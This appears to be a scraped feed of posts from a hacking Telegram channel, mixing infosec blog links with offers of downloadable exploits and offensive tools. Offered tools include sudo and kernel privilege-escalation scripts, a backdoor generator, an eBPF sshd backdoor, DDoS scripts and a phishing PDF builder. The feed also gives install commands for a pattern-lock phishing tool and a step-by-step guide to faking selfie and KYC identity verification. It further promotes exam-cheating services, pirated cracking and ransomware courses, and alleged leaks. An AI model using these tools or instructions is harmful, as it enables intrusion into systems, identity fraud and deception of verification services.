https://anubism3333.blogspot.com/2022/06/how-to-stay-motivated.htmlhttps://anubism3333.blogspot.com/2022/06/at-which-time-you-should-feel-that-you.htmlhttps://anubism3333.blogspot.com/2022/06/the-human-way-of-thinking.htmlhttps://anubism3333.blogspot.com/2022/06/being-alone.htmlhttps://anubism3333.blogspot.com/2022/07/the-quotations-that-reveal-reality.htmlhttps://anubism3333.blogspot.com/2022/07/the-definition-of-love.htmlhttps://hacklido.com/blog/271-windows-forensics-the-art-of-investigating-part-1https://hacklido.com/d/56-windows-file-system-investigation-part-1introductionhttps://hacklido.com/d/51-information-about-windows-registryhttps://hacklido.com/d/55-windows-registry-investigation-cheatsheet-part-1https://lonewarriorco.blogspot.com/2022/10/ram-forensics-using-volatility.htmlhttps://hacklido.com/d/66-yara-languagehttps://hacklido.com/blog/251-securing-your-linux-server-with-host-based-firewall-protection-using-iptableshttps://hacklido.com/blog/252-steps-to-set-up-a-firewall-with-ufwhttps://hacklido.com/blog/258-honeypots-the-game-of-trapshttps://hacklido.com/blog/262-proxy-my-love-part-1https://www.codelivly.com/osint/All my Motivational And Infosec Blogs.
2023-02-02 04:57:51
https://hacklido.com/blog/271-windows-forensics-the-art-of-investigating-part-1By: @hacklathon
2023-02-02 04:56:05
https://hacklido.com/blog/262-proxy-my-love-part-1By:@hacklathon
2023-02-01 12:33:08
Master OAuth 2.0 Vulnerability #bugbounty #infosec  Difficulty : Any OAuth 2.0 Resources :👇• https://owasp.org/www-pdf-archive/20151215-Top_X_OAuth_2_Hacks-asanso.pdf • https://medium.com/@lokeshdlk77/stealing-facebook-mailchimp-application-oauth-2-0-access-token-3af51f89f5b0 • https://medium.com/a-bugz-life/the-wondeful-world-of-oauth-bug-bounty-edition-af3073b354c1 • https://gauravnarwani.com/misconfigured-oauth-to-account-takeover/ • https://medium.com/@Jacksonkv22/oauth-misconfiguration-lead-to-complete-account-takeover-c8e4e89a96a • https://medium.com/@logicbomb_1/bugbounty-user-account-takeover-i-just-need-your-email-id-to-login-into-your-shopping-portal-7fd4fdd6dd56 • https://medium.com/@protector47/full-account-takeover-via-referrer-header-oauth-token-steal-open-redirect-vulnerability-chaining-324a14a1567 • https://hackerone.com/reports/49759 • https://hackerone.com/reports/131202 • https://hackerone.com/reports/6017 • https://hackerone.com/reports/7900 • https://hackerone.com/reports/244958 • https://hackerone.com/reports/405100 • https://ysamm.com/?p=379 • https://amolbaikar.com/facebook-oauth-framework-vulnerability/ •https://medium.com/@godofdarkness.msf/mail-ru-ext-b-scope-account-takeover-1500-abdb1560e5f9 • https://medium.com/@tristanfarkas/finding-a-security-bug-in-discord-and-what-it-taught-me-516cda561295 • https://medium.com/@0xgaurang/case-study-oauth-misconfiguration-leads-to-account-takeover-d3621fe8308b • https://medium.com/@rootxharsh_90844/abusing-feature-to-steal-your-tokens-f15f78cebf74 • http://blog.intothesymmetry.com/2014/02/oauth-2-attacks-and-bug-bounties.html • http://blog.intothesymmetry.com/2015/04/open-redirect-in-rfc6749-aka-oauth-20.html • https://veracode.com/blog/research/spring-social-core-vulnerability-disclosure • https://medium.com/@apkash8/oauth-and-security-7fddce2e1dc5 • https://xploitprotocol.medium.com/exploiting-oauth-2-0-authorization-code-grants-379798888893Thanks You For Reading this 🙏Hope You'll like 👍 it
2023-02-01 10:33:30
https://system32.ink/web-stories/tools-to-detect-malicious-ip-address/
2023-02-01 09:50:05
https://system32.ink/http-header-blind-sql-injection-example/
2023-02-01 09:40:48
http://fullhunt.io
2023-01-31 13:12:37
🔥🔥🔥VMware vRealize Log Insight VMSA-2023-0001 Technical Deep DiveThis vulnerability is exploitable in the default configuration for VMware vRealize Log Insight. We have successfully reproduced this exploit and would like to provide the technical details about how this vulnerability works. 💥PoC for VMSA-2023-0001 affecting VMware vRealize Log Insight which includes the following CVEs:💾 VMware vRealize Log Insight Directory Traversal Vulnerability(CVE-2022-31706)💾 VMware vRealize Log Insight broken access control Vulnerability(CVE-2022-31704)💾 VMware vRealize Log Insight contains an Information Disclosure Vulnerability(CVE-2022-31711)Download:https://system32.ink/news-feed/p/202/
2023-01-31 11:43:12
PoC of CVE-2021-34514(Windows Kernel EoP vuln, ALPC OOB)Download: https://system32.ink/news-feed/p/201/
2023-01-31 09:55:09
CVE-2022-26485 exploit(UAF in XSLT parameter processing, bugzilla )Removing an XSLT parameter during processing could have lead to an exploitable use-after-free. Mozilla have had reports of attacks in the wild abusing this flaw. This vulnerability affects Firefox < 97.0.2, Firefox ESR < 91.6.1, Firefox for Android < 97.3.0, Thunderbird < 91.6.2, and Focus < 97.3.0. ⚠️Tested against Firefox 78.0 (Windows)Download: https://system32.ink/news-feed/p/199/
2023-01-31 07:17:44
The shortest payload for a tiny php reverse shell written in 19 bytes using only non-alphanumeric characters. Hex values inside ⛶ indicate raw bytes.This will help to bypass WAF and execute PHP reverse shell for RCE.Download: https://system32.ink/news-feed/p/198/
2023-01-30 16:59:32
OSINT tool to investigate GitHub profileshttps://github.com/mxrch/gitfiveReceive your WhatsApp messages on Telegramhttps://github.com/subinps/TG-WhatsAppDetecting Windows x86 API hooking and modificationhttps://github.com/ytk2128/api-monitor32Sharing directory and files from cli to ios and android devices without need of an extra clien apphttps://github.com/parvardegr/sharingl
2023-01-30 16:59:31
 CVE-2023-23560 flaw exposes 100 Lexmark printer models to hackhttps://securityaffairs.com/141428/hacking/lexmark-cve-2023-23560-rce.html
2023-01-30 09:47:36
hackebds(2023.1.29 0.3.3)Generate backdoor programs of various architectures. The backdoor program is packaged in shellless pure shellcode and is smal,Pure static backdoor .Armv5, Armv7, Armv8, mipsel, mips,mips64,mipsel64,powerpc, powerpc64,sparc,sparc64 are now supported, and they are still being updated (PS:bash support is added to the reverse shell after version 0.3.1). If the backdoor of the reverse shell is generated with the - power parameter, the reverse shell will continue to be generated on the target machine)Generate reverse_shell shellcode of various architectures during the exploit process, and no null bytes, which facilitates the exploitation of memory corruption vulnerabilities on embedded devices. Armv5, Armv7, Armv8, mipsel, mips, mips64, mipsel64, powerpc, powerpc64,sparc are now supported, and they are still being updated|Generate bind of various architectures bind_Shell file.Support command line generation backdoor and shell code, Strong anti hunting ability,characterized by light, small, efficient and fastDownload: https://system32.ink/news-feed/p/196/
2023-01-30 09:39:12
MYBB_1.8.32_LFI_RCEMyBB 1.8.32 – Chained LFI Remote Code Execution (RCE) (Authenticated) python exploit script…Download: https://system32.ink/news-feed/p/194/
2023-01-30 09:32:05
https://system32.ink/red-teaming-tips/
2023-01-30 09:31:49
https://system32.ink/nmap-tips/
2023-01-29 17:22:07
⚙️ Complete Bug Bounty tool List ⚙️Enjoy :)dnscan https://github.com/rbsec/dnscanKnockpy https://github.com/guelfoweb/knockSublist3r https://github.com/aboul3la/Sublist3rmassdns https://github.com/blechschmidt/massdnsNmap https://nmap.orgMasscan https://github.com/robertdavidgraham/masscanEyeWitness https://github.com/ChrisTruncer/EyeWitnessDirBuster https://sourceforge.net/projects/dirbuster/dirsearch https://github.com/maurosoria/dirsearchGitrob https://github.com/michenriksen/gitrobgit-secrets https://github.com/awslabs/git-secretssandcastle https://github.com/yasinS/sandcastlebucket_finder https://digi.ninja/projects/bucket_finder.phpGoogD0rker https://github.com/ZephrFish/GoogD0rker/Wayback Machine https://web.archive.orgwaybackurls https://gist.github.com/mhmdiaa/adf6bff70142e5091792841d4b372050 Sn1per https://github.com/1N3/Sn1per/XRay https://github.com/evilsocket/xraywfuzz https://github.com/xmendez/wfuzz/patator https://github.com/lanjelot/patatordatasploit https://github.com/DataSploit/datasploithydra https://github.com/vanhauser-thc/thc-hydrachangeme https://github.com/ztgrace/changemeMobSF https://github.com/MobSF/Mobile-Security-Framework-MobSF/ Apktool https://github.com/iBotPeaches/Apktooldex2jar https://sourceforge.net/projects/dex2jar/sqlmap http://sqlmap.org/oxml_xxe https://github.com/BuffaloWill/oxml_xxe/XXE Injector https://github.com/enjoiz/XXEinjectorThe JSON Web Token Toolkit https://github.com/ticarpi/jwt_toolground-control https://github.com/jobertabma/ground-controlssrfDetector https://github.com/JacobReynolds/ssrfDetectorLFISuit https://github.com/D35m0nd142/LFISuiteGitTools https://github.com/internetwache/GitToolsdvcs-ripper https://github.com/kost/dvcs-rippertko-subs https://github.com/anshumanbh/tko-subsHostileSubBruteforcer https://github.com/nahamsec/HostileSubBruteforcerRace the Web https://github.com/insp3ctre/race-the-webysoserial https://github.com/GoSecure/ysoserialPHPGGC https://github.com/ambionics/phpggcCORStest https://github.com/RUB-NDS/CORStestRetire-js https://github.com/RetireJS/retire.jsgetsploit https://github.com/vulnersCom/getsploitFindsploit https://github.com/1N3/Findsploitbfac https://github.com/mazen160/bfacWPScan https://wpscan.org/CMSMap https://github.com/Dionach/CMSmapAmass https://github.com/OWASP/AmassExtra Toolshttp://projectdiscovery.io @freehackingresources
2023-01-29 17:17:00
GHunt (v2) is Google's offensive framework designed for efficient development. It is currently focused on OSINT, but any Google-related usage is possible..♾ https://github.com/mxrch/GHunt♾ https://systemweakness.com/google-mail-hacking-ghunt-v2-gmail-osint-6c76ce78ad35
2023-01-29 12:18:56
https://github.com/indianajson/can-i-take-over-dns
2023-01-29 11:56:55
Exploit for full access to disk C:\  (for all users)Download:https://system32.ink/news-feed/p/190/
2023-01-29 10:39:34
Bugbounty Notes 📒Inclue OWASP Top 10 And more#bugbounty #InfsoecAmazing Git Repo : https://github.com/Voorivex/pentest-guideCheck This Out 👌
2023-01-29 08:37:29
https://system32.ink/web-stories/crack-wifi-passwords-using-fern/
2023-01-29 05:47:41
https://system32.ink/system32-byte-2/
2023-01-29 01:43:39
Rust PDF builderIt includes these premade templates:- adobeacrobate- dropbox- googledrive- office365- onedriveCustom Templates (Own PDF files) will also work.Usage: rust-pdf-creator.exe <input_url> <template/file/list>Example: rust-pdf-creator.exe http://example.com/123.exe onedrive. Download: https://system32.ink/news-feed/p/188/
2023-01-28 13:50:01
https://system32.ink/web-stories/password-hacking-attacks/
2023-01-28 12:36:22
KillMyOTAOTA Killer for iOS 15.0 - 16.1.2Download:- https://system32.ink/news-feed/p/186/
2023-01-28 12:35:06
#DDoS Scripts and MethodsL7/L4/L3 & Game METHODS (USE ONLY FOR EDUCATIONAL PURPOSES!!!)This repo consists of various DDoS scripts, collected from internet. Layer-4 and Layer-7 levels can be targeted using these scripts.Note: Scripts written in 'C' need to be compiled with GCC compiler, first.https://system32.ink/news-feed/p/185/
2023-01-28 12:33:17
sshd_backdoorAbout Using ebpf technique, hijacking the process during sshd service getting the ~/.ssh/authorized_keys to authorize user logging and injecting our public key make our login successful.Main Process in ebpf program:Hook OpenAt syscall enter: check if the sshd process call this, log the pid of sshd.Hook OpenAt Syscall exit: check the pid logged. logging the fd of pid, map pidfd.Hook Read Syscall enter: check the pid logged. logging the user_space_char_buffer of pid.Hook Read Syscall exit: check the pid logged. find the buffer and change the buffer into our Key. Then delete pid in map to avoid blocking administrators’ keys be read.Download Link: https://system32.ink/news-feed/p/184/
2023-01-28 12:29:19
https://system32.ink/bypassing-cloudflare-waf-xss-via-sql-injection/
2023-01-28 11:30:45
https://github.com/0xdea/exploits
2023-01-28 05:18:17
gg's hacker's ( have a good day —❤️ ‼️Here we go again Get a (.in) Free Domain for 1 Year! Offer valid from 26-30th January 2023. condition is youw ill get 1 Domain for Free.Website #hacker_bano_chutiya_nhe 🌜👾🌛
2023-01-28 02:11:30
https://t.me/sidewinders join this channel for more updates .........
2023-01-28 02:10:59
Sourcecode & Sensitive Leaks.NTDC Tripping Server.
2023-01-27 14:44:02
Dear all user's i am deleting this id sorry and wait @hayper007. I am coming with new account Don't sand msg 2hrsRe promot me 😂
2023-01-27 14:02:59
I Can Help You To Clear & Give the training & exam solutions on the below certifications1_CEH.2_CEH Practical.3_eJPT.4_eCCPTv2. 5_eWPT. 6_eWPTxv2.7_CRTP. 8_CRTO. 9_OSCP. 10_OSWE.11_OSEP. 12_OSWP. 13_CPENT 14_CHFI15_eCPTxv216_PNPT17_Burpsuite exam Remote Exam Support possible. If anyone needs message me.Lower prices & passing guaranteed!Follow: https://t.me/alexserviceezPing @examsolutionzWe have added new exam of burpsuite solutions
2023-01-27 09:08:56
https://github.com/iperov/DeepFaceLab
2023-01-27 09:08:55
https://github.com/DamonMohammadbagher/NativePayload_PE1
2023-01-27 07:11:23
#Red_Team_Tactics1. Proxying DLL Loads For Hiding ETWTI Stack Tracinghttps://0xdarkvortex.dev/proxying-dll-loads-for-hiding-etwti-stack-tracing2. Python module for running BOFshttps://github.com/rkbennett/pybof
2023-01-27 07:11:22
#Sec_code_reviewStatistical Analysis to Detect Uncommon Codehttps://synthesis.to/2023/01/26/uncommon_instruction_sequences.html
2023-01-27 06:24:41
Whacking a phishing admin panel for fun and profithttps://ift.tt/RpX7QePSubmitted January 26, 2023 at 10:32AM by thehunter699via reddit https://ift.tt/Ia3shPl
2023-01-27 06:23:37
Gank-RECONSubdomains enumeration, various scans and testing of some vulnerabilities.https://system32.ink/news-feed/p/183/
2023-01-27 06:20:27
OpenCVeOpenCVE is a platform used to locally import the list of CVEs and perform searches on it (by vendors, products, CVSS, CWE...).Users subscribe to vendors or products, and OpenCVE alerts them when a new CVE is created or when an update is done in an existing CVE.https://system32.ink/news-feed/p/182/
2023-01-26 13:57:41
#Malware_analysis"Fighting to LODEINFO: Investigation for Continuous Cyberespionage Based on Open Source", 2023.]-> LODEINFO Triage Tools:https://github.com/nflabs/aa_tools/tree/main/lodeinfo
2023-01-26 13:57:40
#exploit1. CVE-2022-38181:Vulnerability in the Arm Mali GPUhttps://github.blog/2023-01-23-pwning-the-all-google-phone-with-a-non-google-bug2. CVE-2023-0210:Linux Kernel Unauthenticated Remote Heap Overflow Within KSMBDhttps://sysdig.com/blog/cve-2023-0210-linux-kernel-unauthenticated-remote-heap-overflow
2023-01-26 13:57:39
#Threat_Research#Blue_Team_Techniques1. At the Edge of Tier Zero: The Curious Case of the RODChttps://posts.specterops.io/at-the-edge-of-tier-zero-the-curious-case-of-the-rodc-ef5f1799ca062. Sigma Rule to Detect Uncommon Keyboard Layout Loadshttps://gist.github.com/Neo23x0/62a75d4bbd26aa9164fa73384f6a1410]-> Sysmon Config: https://github.com/SwiftOnSecurity/sysmon-config/pull/92/files
2023-01-26 12:19:51
☠️☠️☠️☠️☠️☠️☠️☠️☠️☠️☠️☠️#GiveawayOnRepublicDayTryHackMe 1 Month 3 Vouchers Giveaway...If Anyone is interested in this giveaway then Dope-Me(DM)...with your TryHackMe IDWe'll review your TryHackMe account and based on your progress we will try to ask some basic questions...After that you will be given your TryHackMe Coupon...Dm :- @lexlegion☠️☠️☠️☠️☠️☠️☠️☠️☠️☠️☠️☠️
2023-01-26 09:59:28
https://system32.ink/web-stories/unlock-a-android-device-using-kali-linux/
2023-01-26 06:13:37
Pakistan, Papa logo Ko happy republic day bolo.
2023-01-26 02:17:44
Gantantra diwas ki hardik shubhkamnaye ❤️
2023-01-25 20:50:10
🥳HAPPY REPUBLIC DAY GUYS❣️
2023-01-25 17:44:03
Mullvad VPN Key  7689329868339684 42284748319087392678008071148699 6390042299824693 All key valid for 14 daysEnjoy all 😂
2023-01-25 13:20:43
https://system32.ink/web-stories/how-can-be-phone-hacked/
2023-01-25 11:49:25
Ever wanted to get payload from packed android malware without running android emulator/device? kavanoz make this!https://system32.ink/news-feed/p/181/
2023-01-25 08:30:27
🔰 NEW TOOL FOR PHONE UNLOCK PATTERNS AND PINS 🔰Ⓜ️REQUIREMENTS :Internet : 50 MBphpStorage : 50 MBngrok Features :[+] Real pattern hacking ![+] Updated maintainence ![+] Ngrok link[+] Easy for Beginners !INSTALLATION [Termux] :$ apt-get update -y$ apt-get upgrade -y$ pkg install python -y$ pkg install python2 -y$ pkg install git -y$ pip install lolcat$ git clone https://github.com/noob-hackers/hacklock$ cd $HOME$ ls$ cd hacklock$ ls$ bash setup$ bash hacklock.sh[+]--Now you need internet connection to continue further process and Turn on your device hotspot to get link...[+]--You will recieve patter pin in below image you can see pattern with numbers[+]--You can select any option by clicking on your keyboard[+]--Note:- Don't delete any of the scripts included in core〰〰〰〰〰〰〰〰〰〰〰〰〰
2023-01-25 06:46:01
#hardeningA tool for checking the security hardening options of the Linux kernelhttps://github.com/a13xp0p0v/kconfig-hardened-check
2023-01-25 06:46:00
#Red_Team_Tactics1. Elevation of Privilege from Local Admin to gMSAhttps://aadinternals.com/post/local_admin_to_gmsa2. Keeping LSA secrets out of physical memoryhttps://github.com/elastic/Silhouette3. Basic SSTI - Server-Side Template Injection (2023)https://infosecwriteups.com/basic-ssti-server-side-template-injection-2023-da4995583554
2023-01-25 03:13:25
https://system32.ink/cve-2023-0210-linux-kernel-unauthenticated-remote-heap-overflow-within-ksmbd-exploitation/
2023-01-25 02:35:45
Internet Camera Exploitation ToolThis is a tool meant to assist cyber security researchers on discovering outdated and vulnerable camera systems on the internet by utilizing shodan.ioI was able to discover thousands of vulnerable cameras using itTool:- https://system32.ink/news-feed/p/179/
2023-01-25 02:33:44
WordPress Plugin Elementor 3.6.2 – Remote Code Execution (RCE) (Authenticated)] Date: 04/16/2022Exploit:- https://system32.ink/news-feed/p/177/
2023-01-24 13:44:38
#Research"StealthyIMU: Stealing Permission-protected Private Information From Smartphone Voice Assistant Using Zero-Permission Sensors", NDSS 2023.]-> Repo: https://github.com/Samsonsjarkal/StealthyIMU
2023-01-24 13:44:37
#exploit1. A Step-By-Step Introduction To The Use Of ROP Gadgets To Bypass DEPhttps://cybergeeks.tech/a-step-by-step-introduction-to-the-use-of-rop-gadgets-to-bypass-dep2. b3typer - Simple typer bughttps://blog.bi0s.in/2023/01/23/Pwn/bi0sCTF22-b3typer3. CVE-2022-2347:U-Boot - Unchecked Download Size/Direction in USB DFUhttps://research.nccgroup.com/2023/01/20/technical-advisory-u-boot-unchecked-download-size-and-direction-in-usb-dfu-cve-2022-2347
2023-01-24 13:44:36
#Malware_analysis1. Analyzing Malicious OneNote Documentshttps://blog.didierstevens.com/2023/01/22/analyzing-malicious-onenote-documents2. Roaming Mantis implements new DNS changer in its malicious mobile app in 2022https://securelist.com/roaming-mantis-dns-changer-in-malicious-mobile-app/108464
2023-01-24 08:17:35
A #browser_extension for OSINT searchhttps://github.com/ninoseki/mitakaThe all-in-one Red Team #extension for Web Pentesthttps://github.com/LasCC/Hack-Tools
2023-01-24 07:19:05
Bug : Facebook Group Members DisclosureIntro : A Non-member can determine if someone is the member of a private group or not via CometHovercardQueryRendererQuery graphQL mutation.Video POC:- https://system32.ink/news-feed/p/176/
2023-01-24 03:29:55
Java XML security issues and how to address themhttps://semgrep.dev/blog/2022/xml-security-in-java
2023-01-23 17:54:51
https://github.com/TheSadError/dash
2023-01-23 16:17:49
#DFIRShareFinder: How Threat Actors Discover File Shareshttps://thedfirreport.com/2023/01/23/sharefinder-how-threat-actors-discover-file-shares
2023-01-23 16:17:48
#Threat_ResearchTraffic signals: The VASTFLUX Takedownhttps://www.humansecurity.com/learn/blog/traffic-signals-the-vastflux-takedown
2023-01-23 16:17:47
#AnalyticsCybersecurity Trends Q1/23:⬆️ Pwd spraying/creds stuffing; ⬆️ Phishing w/ new file types, eg .one, .iso, .lnk;⬆️ Rust malware / loaders (+Go +Nim +Zig);⬆️ Sliver implants; ⬆️ Abused legit RA software;⬆️ Abused legit encryption tools (ransom);⬆️ Token/Cloud API abuse;⬇️ Malware attacks on non-standard ports;⬇️ E-Skimming Incidents;⬇️ Office Macros.
2023-01-23 16:17:46
#Offensive_security1. Cobalt Strike Beacon Object File for kernel exploitation using AMD's Ryzen Master Driver (version 17)https://github.com/tijme/amd-ryzen-master-driver-v17-exploit2. A script to automate privilege escalation with CVE-2023-22809 vulnerabilityhttps://github.com/n3m1dotsys/CVE-2023-22809-sudoedit-privesc
2023-01-23 15:47:01
SQLi Hunter v2 is a python program that checks for SQL (and Blind) injection vulnerability in URL’s. The program is designed to be easy to use, practical and beneficial. The intention of this tool is to include it in your ethical Bug Bounty Hunting methodology. Please do not use this tool on any website without having its permission.https://system32.ink/news-feed/p/175/
2023-01-23 15:40:32
PhoneSploit ProPhoneSploit with Metasploit Integration.An All-In-One hacking tool to remotely exploit Android devices using ADB and Metasploit-Framework to get a Meterpreter session.https://system32.ink/news-feed/p/174/
2023-01-23 15:23:21
Echidna – A Fast Smart Contract FuzzerEchidna is a weird creature that eats bugs and is highly electrosensitive (with apologies to Jacob Stanley)https://system32.ink/news-feed/p/173/
2023-01-23 11:51:52
[META BUG BOUNTY 2023] - Video Pochttps://system32.ink/news-feed/p/171/
2023-01-23 11:43:26
CVE-2023-22809 – sudo Privilege escalationAffected sudo versions: 1.8.0 to 1.9.12p1This script automates the exploitation of the CVE-2023-22809 vulnerability to gain a root shell.Script: https://system32.ink/news-feed/p/170/
2023-01-23 10:28:32
Solaris 10 LPE ExploitDownload: https://system32.ink/news-feed/p/169/
2023-01-23 06:07:47
90% Pakistan is out of electricity after major cyber attack on electricity systems.बिजली प्रणालियों पर बड़े साइबर हमले के बाद 90% पाकिस्तान में बिजली गुल।
2023-01-23 00:05:53
Hi Techies, Ethical Hackers and Cyber security enthusiasts. I am offering a great opportunity to you all to work with us at Techofide.Here is the link to apply: https://forms.gle/4c4zohet8oKbBv6D8Waiting for your responses everyone! Have a great day😀
2023-01-22 17:58:02
#toolsUtility to find hidden Linux kernel moduleshttps://github.com/jafarlihi/modreveal]-> LKM rootkit for Linux Kernels 2.6.x/3.x/4.x/5.x (x86/x86_64 and ARM64):https://github.com/m0nad/Diamorphine
2023-01-22 17:58:01
#exploit1. CVE-2022-42864:Concurrent Execution using Shared Resource with Improper Synchronization ("Race Condition")https://muirey03.blogspot.com/2023/01/cve-2022-42864-diabolical-cookies.html2. CVE-2022-25637:Multiple TOCTOU vulns in peripheral devices (Razer, EVGA, MSI, AMI)https://www.cyberark.com/resources/threat-research-blog/inglourious-drivers-a-journey-of-finding-vulnerabilities-in-drivers
2023-01-22 15:38:13
https://github.com/JoelGMSec/Cloudtopolis
2023-01-22 15:38:12
📚 ILLEGAL7 HACKERS ALL COURSES 📚Software cracking🟢Advanced software cracking 🟢Cracker Tools 2.8 🟢Dotnet Software Reverse Engineering And Static Analysis Course🟢Ransomware virus course 🟢Reverse Engineering Course🟢Software Cracking CourseSize : 6.11 GB⬇️Link :- https://mega.nz/folder/DpM2jT4J#Kl_o0ryTXeIZtsMKyUgJVQpassword : Theillegalhacker7@@@
2023-01-22 10:38:25
CVE-2023-0398 modoboa – mail ServerDescriptionGET /admin/domains/{id}/delete/ page is vulnerable to a CSRF attack.Exploit: https://system32.ink/news-feed/p/165/
2023-01-22 10:11:29
Facebook 0-day Bug (account takeover) Still not patchedcheck out now : bit.ly/3iXGYNkExploit
2023-01-22 09:47:29
https://system32.ink/the-blockchain-economy-a-beginners-guide-to-institutional-cryptoeconomics/
2023-01-22 05:54:36
https://t.me/ethicalhackx
2023-01-22 04:18:10
https://system32.ink/recon-guide-for-pentesters-and-bug-bounty-hunters/
2023-01-22 02:23:55
❌SCAMMER❌Elys.vip@ajaysirforeveryone
2023-01-21 17:01:11
#UAV #UAS #UUV #forensics #security #vulnerabilities
2023-01-21 17:01:10
🕵️‍♂️Руководство по поиску в твиттере(расширенный вариант)🕵️‍♂️Twitter Search Guide (extended version)#osint #twitter‌‌Translation: ru-en🕵️‍♂️Twitter Search Guide (Advanced)🕵️‍♂️Twitter Search Guide (extended version)#osint #twitter‌‌
2023-01-21 13:25:49
https://0xdf.gitlab.io/2023/01/14/htb-shoppy
2023-01-21 13:25:48
https://github.com/iustin24/chameleon
2023-01-21 13:20:36
Linux kernel stack buffer overflow in nftables(CVE-2023-0179)The vulnerability consists of a stack BOF due to an integer underflow vulnerability inside the nft_payload_copy_vlan function, which is invoked with nft_payload expressions as long as a VLAN tag is present in the current skb.⚠️The exploitation could allow the leakage of both stack and heap addresses and, potentially, a LPE to the root user via arbitrary code execution.Exploit: https://system32.ink/news-feed/p/162/
2023-01-21 13:00:01
Get GPT like chatGPT on your terminalhttps://system32.ink/news-feed/p/161/
2023-01-21 12:09:35
#Blue_Team_Techniques"Best Practices for MITRE ATT&CK Mapping", January 2023.
2023-01-21 12:09:34
#DFIRThe Key to Identify PsExechttps://aboutdfir.com/the-key-to-identify-psexec
2023-01-21 12:09:33
#tools#Cloud_Security1. Kubernetes exploitation toolhttps://github.com/Rolix44/Kubestroyer2. Azure Attack Paths Managementhttps://sofblocks.github.io/azure-attack-paths
2023-01-21 10:59:04
https://system32.ink/building-a-network-scanner-in-rust/
2023-01-21 03:08:26
https://system32.ink/system32-byte-1
2023-01-20 19:37:19
Поисковая система You.com запустила чат-бота с искусственным интеллектом, под названием youChat 💻 Чат-бот способен отвечать на вопросы, и вести разговоры, на подобии с ботом ChatGPT, хотя и имеет значительно меньший функционал, относительно последнего. Разработчики заявляют, что добавление youChat значительно расширяет возможности поиска нужной информации в Интернете. Так, он в состоянии помочь с простыми ответами на общие вопросы, предложением идей, перевода, обобщении текста, составлении электронных писем, а также написании кода. Тем не менее система пока находится в бета-тестировании, и разработчики не рекомендуют принимать на веру все ответы, что выдаёт бот.
2023-01-20 19:25:04
#exploit1. CVE-2022-47966:RCE vulnerability in multiple ManageEngine (Apache Santuario (xmlsec) <=1.4.1) productshttps://github.com/horizon3ai/CVE-2022-47966]-> https://www.horizon3.ai/manageengine-cve-2022-47966-technical-deep-dive2. CVE-2022-39955:Charset confusion + WAF bypasses via 0dayshttps://terjanq.medium.com/waf-bypasses-via-0days-d4ef1f212ec3. Microsoft Teams RCEhttps://blog.pksecurity.io/2023/01/16/2022-microsoft-teams-rce.html
2023-01-20 13:25:05
Android Exploit to get a System based shell (UID 1000) on ANY Samsung Mobile Device based on CVE-2019-162531) Downgrade to vulnerable SamsungTTS app2) Install exploit APK3) Exploit vulnerability to achieve System rights https://forum.xda-developers.com/t/system-shell-exploit-all-samsung-mobile-devices-no-bl-unlock-required.4543071/
2023-01-20 12:50:43
🔥🔥🔥FoxitReader Precise Heap Spray 0c0c0c0c bc.⚠️Testesd version: 9.0.1.1049
2023-01-20 12:26:49
Google Chrome “SymStealer” (CVE-2022-3656)https://system32.ink/news-feed/p/157/
2023-01-20 12:19:21
https://system32.ink/azure-attack-paths-management/
2023-01-20 11:12:24
Centreon Map plugin allows pre-auth remote process memory dump (CVSS 8.3) - PoChttps://ift.tt/3U9xKJISubmitted January 19, 2023 at 12:33PM by qwerty0x41via reddit https://ift.tt/xvS2PIr
2023-01-19 15:28:33
https://infosecwriteups.com/hack-file-inclusion-in-dvwa-a-full-walkthrough-stackzero-ae0ed2670d23?source=rss----7b722bfd1b8d---4
2023-01-19 15:09:30
https://github.com/KSCHdsc/BlackCap-Grabber
2023-01-19 14:21:29
#exploit1. CVE-2023-0179:Linux kernel stack buffer overflow in nftableshttps://seclists.org/oss-sec/2023/q1/202. Security Audit of Git:CVE-2022-23521:Truncated Allocation Leading to Out of Bounds Write Via Large Number of AttributesCVE-2022-41903: Out of Bounds Memory Write in Log Formattinghttps://x41-dsec.de/security/research/news/2023/01/17/git-security-audit-ostif
2023-01-19 14:21:28
#tools#Blue_Team_Techniques1. MIMEDefang - e-mail filtering tool that works with the Sendmail "Milter" libraryhttps://github.com/The-McGrail-Foundation/MIMEDefang2. Automated Penetration Testing Reporting Systemhttps://github.com/Anof-cyber/APTRS
2023-01-19 06:19:28
Some internal IPs from pak
2023-01-19 03:13:19
Learn SQLI In A Easy Wayhttps://system32.ink/news-feed/p/154/
2023-01-19 02:44:43
https://system32.ink/cybersecurity-top-10-predictions-for-2023/
2023-01-18 08:01:43
https://github.com/infosecn1nja/red-team-scripts
2023-01-18 07:11:12
https://system32.ink/creating-a-polymorphic-malware-using-chatgpt/
2023-01-17 18:09:35
After you have your TikTok account ready, open your selfie on you PC, make anew video on TikTok and select “Dynamic Photo” filter.After you selected your filter, point your camera to the selfie that's on you PC andyou will see that the selfie is moving, smiling, rotating their eyes, etc.Record a small video and upload it to TikTok (Make sure its public)After its uploaded, go to: https://ssstik.io/en (ticktock video downloader ) and paste your video link toDownload your video without the TikTok tag.After that its easy, go to OBS, under “Sources” select “Media” and select yourTikTok video that you just downloaded.My targeted website requires me to verify thru my phone.This part if you service only serve through AppsFor this, you would need a few tools:● LDplayer (Android Emulator)● Logitech capture softwareAfter you downloaded those 2 tools, create a new LDplayer android emulatorwindow and select 640x640 resolutionThen, open Logitech capture software, open you selfie/docs photo, selectresolution to 1080p and then in “Source 1” select your opened photo title. Thenhead to ManyCams, select camera source as “Logi Capture”.Then, head back to your android emulator, go do your kyc and when emulator askif you want to use webcam or screen crop, select webcam and you should seeyour uploaded photo right there, go on resize or change position of the photo ofyour needs and take the picture.Thats it! This should be enough to bypass a lot of kyc providers and will allow youto easily verify your account!Download links:OBS: https://obsproject.com/LDplayer: https://www.ldplayer.net/Logitech capture: https://www.logitech.com/en-gb/software/capture.htm
2023-01-17 18:00:33
How To Bypass Selfie Verification❓Table of content● Know KYC Verification mechanism● How to fake live webcam● How to fake rotate head verification● How to make you selfie more alive● How to fake phone required kyc● ResourceOld Standart : Upload Document and Photo with Signature or Holding Written Name and service  on cardboard (example old binace if i remember correctly service before 2013 ?)ScanFace: Simple Request to scanning faceRotated head: Require you rotate you head folowing the circle Blink Life Test : Require you to blink follwong countdown orderID Card+Face Selfie + Mostly Populer among Indonesia Apps like E-wallet and exchangerFaking the WebcamMost of website this day enforce verification through selfie-life cam, site will ask you to allow turn on camera and record you face, which can have serios consequence if company you use are not good in keeping their data.There way to counter this defense  You need to download:● OBS (With virtual cam plugin)● ManyCams -- Not free please go to reddit piracy megathread to find safe and clean pirate versionSome of download links will be available at the last page of this thread.Install both of them and ready your docs.Now, open OBS and under “Sources” tab click on “+” and then “Image”Then, select your image path and press okay. You will see your selected image 